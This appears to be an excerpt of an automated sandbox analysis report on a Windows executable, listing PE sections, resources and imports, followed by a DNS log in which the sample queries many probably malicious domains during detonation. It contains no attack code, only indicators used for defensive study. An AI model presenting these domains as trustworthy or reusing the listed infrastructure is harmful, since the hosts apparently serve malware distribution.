IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x11000	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xc6000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc22f4	0x254	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0xc3000	0x1a4	.didata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xb39e4	0xb3a00	False	0.34525867693110646	data	6.357635049994181	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.itext	0xb5000	0x1688	0x1800	False	0.54443359375	data	5.971425428435973	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xb7000	0x37a4	0x3800	False	0.36097935267857145	data	5.048648594372454	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.bss	0xbb000	0x6de8	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xc2000	0xfdc	0x1000	False	0.3798828125	data	5.029087481102678	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didata	0xc3000	0x1a4	0x200	False	0.345703125	data	2.7509822285969876	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.edata	0xc4000	0x9a	0x200	False	0.2578125	data	1.877162954504408	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.tls	0xc5000	0x18	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xc6000	0x5d	0x200	False	0.189453125	data	1.3838943752217987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc7000	0x11000	0x11000	False	0.18623621323529413	data	3.69581702026596	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc7678	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	English	United States	0.1174924924924925
RT_ICON	0xc80e0	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States	0.15792682926829268
RT_ICON	0xc8748	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States	0.23387096774193547
RT_ICON	0xc8a30	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States	0.39864864864864863
RT_ICON	0xc8b58	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	English	United States	0.08339210155148095
RT_ICON	0xca180	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States	0.1023454157782516
RT_ICON	0xcb028	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States	0.10649819494584838
RT_ICON	0xcb8d0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States	0.10838150289017341
RT_ICON	0xcbe38	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States	0.8712011577424024
RT_ICON	0xcd120	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	English	United States	0.05668398677373642
RT_ICON	0xd1348	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States	0.08475103734439834
RT_ICON	0xd38f0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States	0.09920262664165103
RT_ICON	0xd4998	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States	0.2047872340425532
RT_STRING	0xd4e00	0x360	data			0.34375
RT_STRING	0xd5160	0x260	data			0.3256578947368421
RT_STRING	0xd53c0	0x45c	data			0.4068100358422939
RT_STRING	0xd581c	0x40c	data			0.3754826254826255
RT_STRING	0xd5c28	0x2d4	data			0.39226519337016574
RT_STRING	0xd5efc	0xb8	data			0.6467391304347826
RT_STRING	0xd5fb4	0x9c	data			0.6410256410256411
RT_STRING	0xd6050	0x374	data			0.4230769230769231
RT_STRING	0xd63c4	0x398	data			0.3358695652173913
RT_STRING	0xd675c	0x368	data			0.3795871559633027
RT_STRING	0xd6ac4	0x2a4	data			0.4275147928994083
RT_RCDATA	0xd6d68	0x10	data			1.5
RT_RCDATA	0xd6d78	0x2c4	data			0.6384180790960452
RT_RCDATA	0xd703c	0x2c	data			1.1363636363636365
RT_GROUP_ICON	0xd7068	0xbc	data	English	United States	0.6170212765957447
RT_VERSION	0xd7124	0x584	data	English	United States	0.2754957507082153
RT_MANIFEST	0xd76a8	0x7a8	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.3377551020408163

DLL	Import
kernel32.dll	GetACP, GetExitCodeProcess, LocalFree, CloseHandle, SizeofResource, VirtualProtect, VirtualFree, GetFullPathNameW, ExitProcess, HeapAlloc, GetCPInfoExW, RtlUnwind, GetCPInfo, GetStdHandle, GetModuleHandleW, FreeLibrary, HeapDestroy, ReadFile, CreateProcessW, GetLastError, GetModuleFileNameW, SetLastError, FindResourceW, CreateThread, CompareStringW, LoadLibraryA, ResetEvent, GetVersion, RaiseException, FormatMessageW, SwitchToThread, GetExitCodeThread, GetCurrentThread, LoadLibraryExW, LockResource, GetCurrentThreadId, UnhandledExceptionFilter, VirtualQuery, VirtualQueryEx, Sleep, EnterCriticalSection, SetFilePointer, LoadResource, SuspendThread, GetTickCount, GetFileSize, GetStartupInfoW, GetFileAttributesW, InitializeCriticalSection, GetSystemWindowsDirectoryW, GetThreadPriority, SetThreadPriority, GetCurrentProcess, VirtualAlloc, GetSystemInfo, GetCommandLineW, LeaveCriticalSection, GetProcAddress, ResumeThread, GetVersionExW, VerifyVersionInfoW, HeapCreate, GetWindowsDirectoryW, VerSetConditionMask, GetDiskFreeSpaceW, FindFirstFileW, GetUserDefaultUILanguage, lstrlenW, QueryPerformanceCounter, SetEndOfFile, HeapFree, WideCharToMultiByte, FindClose, MultiByteToWideChar, LoadLibraryW, SetEvent, CreateFileW, GetLocaleInfoW, GetSystemDirectoryW, DeleteFileW, GetLocalTime, GetEnvironmentVariableW, WaitForSingleObject, WriteFile, ExitThread, DeleteCriticalSection, TlsGetValue, GetDateFormatW, SetErrorMode, IsValidLocale, TlsSetValue, CreateDirectoryW, GetSystemDefaultUILanguage, EnumCalendarInfoW, LocalAlloc, GetUserDefaultLangID, RemoveDirectoryW, CreateEventW, SetThreadLocale, GetThreadLocale
comctl32.dll	InitCommonControls
version.dll	GetFileVersionInfoSizeW, VerQueryValueW, GetFileVersionInfoW
user32.dll	CreateWindowExW, TranslateMessage, CharLowerBuffW, CallWindowProcW, CharUpperW, PeekMessageW, GetSystemMetrics, SetWindowLongW, MessageBoxW, DestroyWindow, CharUpperBuffW, CharNextW, MsgWaitForMultipleObjects, LoadStringW, ExitWindowsEx, DispatchMessageW
oleaut32.dll	SysAllocStringLen, SafeArrayPtrOfIndex, VariantCopy, SafeArrayGetLBound, SafeArrayGetUBound, VariantInit, VariantClear, SysFreeString, SysReAllocStringLen, VariantChangeType, SafeArrayCreate
netapi32.dll	NetWkstaGetInfo, NetApiBufferFree
advapi32.dll	ConvertStringSecurityDescriptorToSecurityDescriptorW, RegQueryValueExW, AdjustTokenPrivileges, GetTokenInformation, ConvertSidToStringSidW, LookupPrivilegeValueW, RegCloseKey, OpenProcessToken, RegOpenKeyExW

Name	Ordinal	Address
TMethodImplementationIntercept	3	0x4541a8
__dbk_fcall_wrapper	2	0x40d0a0
dbkFCallWrapperAddr	1	0x4be63c

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 6, 2023 14:50:47.245604038 CET	192.168.2.5	1.1.1.1	0x798d	Standard query (0)	sparksteam.site	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:50:48.316284895 CET	192.168.2.5	1.1.1.1	0xcc01	Standard query (0)	sidemark.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:51:03.061697960 CET	192.168.2.5	1.1.1.1	0x59b	Standard query (0)	false.apparelsilver.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:51:04.138967991 CET	192.168.2.5	1.1.1.1	0x8515	Standard query (0)	www.agenment.cloud	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.019241095 CET	192.168.2.5	1.1.1.1	0x3e47	Standard query (0)	myptofgrtulo.info	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.471086025 CET	192.168.2.5	1.1.1.1	0xaf22	Standard query (0)	geo.netsupportsoftware.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:12.119625092 CET	192.168.2.5	1.1.1.1	0xa025	Standard query (0)	send.planewool.xyz	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.135082006 CET	192.168.2.5	1.1.1.1	0x433b	Standard query (0)	kapetownlink.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.817358971 CET	192.168.2.5	1.1.1.1	0x35d6	Standard query (0)	axsboe-campaign.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.817611933 CET	192.168.2.5	1.1.1.1	0x9bc7	Standard query (0)	axsboe-campaign.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:13.837287903 CET	192.168.2.5	1.1.1.1	0x9e68	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.837466002 CET	192.168.2.5	1.1.1.1	0x4260	Standard query (0)	clients2.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:13.838112116 CET	192.168.2.5	1.1.1.1	0xfe1f	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.838414907 CET	192.168.2.5	1.1.1.1	0xe4a4	Standard query (0)	accounts.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:15.598211050 CET	192.168.2.5	1.1.1.1	0x758a	Standard query (0)	aefd.nelreports.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:15.598735094 CET	192.168.2.5	1.1.1.1	0xcd0a	Standard query (0)	aefd.nelreports.net	65	IN (0x0001)	false
Dec 6, 2023 14:52:18.296484947 CET	192.168.2.5	1.1.1.1	0x5184	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.296755075 CET	192.168.2.5	1.1.1.1	0xe9e3	Standard query (0)	www.google.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:19.625871897 CET	192.168.2.5	1.1.1.1	0x8ed6	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:19.626961946 CET	192.168.2.5	1.1.1.1	0xa8c5	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:19.847559929 CET	192.168.2.5	1.1.1.1	0x7513	Standard query (0)	login.microsoftonline.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:19.847795963 CET	192.168.2.5	1.1.1.1	0x9e29	Standard query (0)	login.microsoftonline.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:20.256104946 CET	192.168.2.5	1.1.1.1	0x1e5e	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:20.256351948 CET	192.168.2.5	1.1.1.1	0x385d	Standard query (0)	www.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:21.031626940 CET	192.168.2.5	1.1.1.1	0x7d06	Standard query (0)	www.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:21.031810999 CET	192.168.2.5	1.1.1.1	0x8753	Standard query (0)	www.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:21.056427002 CET	192.168.2.5	1.1.1.1	0x2091	Standard query (0)	aadcdn.msftauth.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:21.056670904 CET	192.168.2.5	1.1.1.1	0xae3c	Standard query (0)	aadcdn.msftauth.net	65	IN (0x0001)	false
Dec 6, 2023 14:52:25.551394939 CET	192.168.2.5	1.1.1.1	0x96fb	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:25.551944017 CET	192.168.2.5	1.1.1.1	0x1a31	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:25.757327080 CET	192.168.2.5	1.1.1.1	0xef2f	Standard query (0)	browser.events.data.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:25.757556915 CET	192.168.2.5	1.1.1.1	0x9a49	Standard query (0)	browser.events.data.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:25.963109970 CET	192.168.2.5	1.1.1.1	0xeae9	Standard query (0)	assets.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:25.963356972 CET	192.168.2.5	1.1.1.1	0xd18a	Standard query (0)	assets.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:27.674927950 CET	192.168.2.5	1.1.1.1	0xd62a	Standard query (0)	c.msn.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:27.675107002 CET	192.168.2.5	1.1.1.1	0xded2	Standard query (0)	c.msn.com	65	IN (0x0001)	false
Dec 6, 2023 14:52:31.656455994 CET	192.168.2.5	1.1.1.1	0xaea0	Standard query (0)	ecn.dev.virtualearth.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:31.656790018 CET	192.168.2.5	1.1.1.1	0xf8be	Standard query (0)	ecn.dev.virtualearth.net	65	IN (0x0001)	false
Dec 6, 2023 14:52:32.351938009 CET	192.168.2.5	1.1.1.1	0x3ad4	Standard query (0)	pstbbk.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.361363888 CET	192.168.2.5	1.1.1.1	0xafe1	Standard query (0)	collect.installeranalytics.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.452419043 CET	192.168.2.5	1.1.1.1	0x7f33	Standard query (0)	ecn.dev.virtualearth.net	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.452588081 CET	192.168.2.5	1.1.1.1	0xc31c	Standard query (0)	ecn.dev.virtualearth.net	65	IN (0x0001)	false
Dec 6, 2023 14:52:33.479685068 CET	192.168.2.5	1.1.1.1	0x12d0	Standard query (0)	allroadslimit.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:35.192425013 CET	192.168.2.5	1.1.1.1	0x69cc	Standard query (0)	231005002055611.bcn.lca62.shop	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:35.701577902 CET	192.168.2.5	1.1.1.1	0xeebd	Standard query (0)	ambadevgroup.info	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:35.971566916 CET	192.168.2.5	1.1.1.1	0x3cbb	Standard query (0)	dl.likeasurfer.com	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:38.491693974 CET	192.168.2.5	1.1.1.1	0x331b	Standard query (0)	mysoftwareusa.info	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:52.443114996 CET	192.168.2.5	1.1.1.1	0xc20c	Standard query (0)	tankqueueipjsh.pw	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.200229883 CET	192.168.2.5	1.1.1.1	0x476a	Standard query (0)	110.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.443027973 CET	192.168.2.5	1.1.1.1	0xc394	Standard query (0)	111.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.772416115 CET	192.168.2.5	1.1.1.1	0xfb4e	Standard query (0)	112.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:54.988406897 CET	192.168.2.5	1.1.1.1	0x2928	Standard query (0)	113.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:55.117197990 CET	192.168.2.5	1.1.1.1	0x537b	Standard query (0)	114.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:55.205759048 CET	192.168.2.5	1.1.1.1	0xef4c	Standard query (0)	115.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:59.307820082 CET	192.168.2.5	1.1.1.1	0x14a0	Standard query (0)	110.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:59.567771912 CET	192.168.2.5	1.1.1.1	0xa1dc	Standard query (0)	111.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.129266977 CET	192.168.2.5	1.1.1.1	0x4710	Standard query (0)	112.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.192856073 CET	192.168.2.5	1.1.1.1	0x7fe8	Standard query (0)	113.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.203530073 CET	192.168.2.5	1.1.1.1	0x8eb2	Standard query (0)	115.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:02.210166931 CET	192.168.2.5	1.1.1.1	0x6a17	Standard query (0)	114.t.keepitpumpin.io	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:53:53.484878063 CET	192.168.2.5	1.1.1.1	0xc64a	Standard query (0)	m74b54.space	A (IP address)	IN (0x0001)	false

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 6, 2023 14:50:47.503981113 CET	1.1.1.1	192.168.2.5	0x798d	No error (0)	sparksteam.site		104.21.52.223	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:50:47.503981113 CET	1.1.1.1	192.168.2.5	0x798d	No error (0)	sparksteam.site		172.67.204.180	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:50:48.421811104 CET	1.1.1.1	192.168.2.5	0xcc01	No error (0)	sidemark.xyz		172.67.165.204	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:50:48.421811104 CET	1.1.1.1	192.168.2.5	0xcc01	No error (0)	sidemark.xyz		104.21.73.195	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:51:03.167031050 CET	1.1.1.1	192.168.2.5	0x59b	No error (0)	false.apparelsilver.xyz		104.21.13.66	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:51:03.167031050 CET	1.1.1.1	192.168.2.5	0x59b	No error (0)	false.apparelsilver.xyz		172.67.198.151	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:51:04.253377914 CET	1.1.1.1	192.168.2.5	0x8515	No error (0)	www.agenment.cloud		185.23.108.224	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.204879999 CET	1.1.1.1	192.168.2.5	0x3e47	No error (0)	myptofgrtulo.info		95.142.47.11	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.571279049 CET	1.1.1.1	192.168.2.5	0xaf22	No error (0)	geo.netsupportsoftware.com		62.172.138.67	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.571279049 CET	1.1.1.1	192.168.2.5	0xaf22	No error (0)	geo.netsupportsoftware.com		62.172.138.8	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:11.571279049 CET	1.1.1.1	192.168.2.5	0xaf22	No error (0)	geo.netsupportsoftware.com		51.142.119.24	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:12.225218058 CET	1.1.1.1	192.168.2.5	0xa025	No error (0)	send.planewool.xyz		172.67.157.197	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:12.225218058 CET	1.1.1.1	192.168.2.5	0xa025	No error (0)	send.planewool.xyz		104.21.90.147	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.234903097 CET	1.1.1.1	192.168.2.5	0x433b	No error (0)	kapetownlink.com		159.223.29.40	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.921313047 CET	1.1.1.1	192.168.2.5	0x9bc7	No error (0)	axsboe-campaign.com			65	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.101	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.100	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.102	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.113	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.139	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.931917906 CET	1.1.1.1	192.168.2.5	0x9e68	No error (0)	clients.l.google.com		142.251.16.138	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.932884932 CET	1.1.1.1	192.168.2.5	0xfe1f	No error (0)	accounts.google.com		142.251.111.84	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.933748007 CET	1.1.1.1	192.168.2.5	0x4260	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:13.991481066 CET	1.1.1.1	192.168.2.5	0x35d6	No error (0)	axsboe-campaign.com		104.21.37.216	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:13.991481066 CET	1.1.1.1	192.168.2.5	0x35d6	No error (0)	axsboe-campaign.com		172.67.213.153	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:15.697165012 CET	1.1.1.1	192.168.2.5	0xcd0a	No error (0)	aefd.nelreports.net	aefd.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:15.697308064 CET	1.1.1.1	192.168.2.5	0x758a	No error (0)	aefd.nelreports.net	aefd.nelreports.net.akamaized.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392381907 CET	1.1.1.1	192.168.2.5	0xe9e3	No error (0)	www.google.com			65	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.147	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.103	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.99	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.106	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.105	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:18.392438889 CET	1.1.1.1	192.168.2.5	0x5184	No error (0)	www.google.com		142.251.16.104	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:19.720479965 CET	1.1.1.1	192.168.2.5	0x8ed6	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:19.721638918 CET	1.1.1.1	192.168.2.5	0xa8c5	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:19.942338943 CET	1.1.1.1	192.168.2.5	0x9e29	No error (0)	login.microsoftonline.com	login.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:19.942363977 CET	1.1.1.1	192.168.2.5	0x7513	No error (0)	login.microsoftonline.com	login.mso.msidentity.com		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:20.351063013 CET	1.1.1.1	192.168.2.5	0x385d	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:20.351572037 CET	1.1.1.1	192.168.2.5	0x1e5e	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:21.126123905 CET	1.1.1.1	192.168.2.5	0x7d06	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:21.127217054 CET	1.1.1.1	192.168.2.5	0x8753	No error (0)	www.msn.com	www-msn-com.a-0003.a-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:21.151248932 CET	1.1.1.1	192.168.2.5	0x2091	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:21.151248932 CET	1.1.1.1	192.168.2.5	0x2091	No error (0)	cs1100.wpc.omegacdn.net		152.199.4.44	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:21.151453018 CET	1.1.1.1	192.168.2.5	0xae3c	No error (0)	aadcdn.msftauth.net	cs1100.wpc.omegacdn.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:25.646199942 CET	1.1.1.1	192.168.2.5	0x1a31	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:25.646279097 CET	1.1.1.1	192.168.2.5	0x96fb	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:25.877908945 CET	1.1.1.1	192.168.2.5	0xef2f	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:25.879606962 CET	1.1.1.1	192.168.2.5	0x9a49	No error (0)	browser.events.data.msn.com	global.asimov.events.data.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:26.058242083 CET	1.1.1.1	192.168.2.5	0xd18a	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:26.058923960 CET	1.1.1.1	192.168.2.5	0xeae9	No error (0)	assets.msn.com	assets.msn.com.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:27.769851923 CET	1.1.1.1	192.168.2.5	0xd62a	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:27.770410061 CET	1.1.1.1	192.168.2.5	0xded2	No error (0)	c.msn.com	c-msn-com-nsatc.trafficmanager.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:31.751269102 CET	1.1.1.1	192.168.2.5	0xaea0	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:31.752137899 CET	1.1.1.1	192.168.2.5	0xf8be	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:32.453641891 CET	1.1.1.1	192.168.2.5	0x3ad4	No error (0)	pstbbk.com		157.230.96.32	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.482036114 CET	1.1.1.1	192.168.2.5	0xafe1	No error (0)	collect.installeranalytics.com		54.165.145.62	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.482036114 CET	1.1.1.1	192.168.2.5	0xafe1	No error (0)	collect.installeranalytics.com		54.165.38.232	A (IP address)	IN (0x0001)	false
Dec 6, 2023 14:52:32.547023058 CET	1.1.1.1	192.168.2.5	0x7f33	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
Dec 6, 2023 14:52:32.547544956 CET	1.1.1.1	192.168.2.5	0xc31c	No error (0)	ecn.dev.virtualearth.net	ssl2.tiles.virtualearth.net.edgekey.net		CNAME (Canonical name)	IN (0x0001)	false
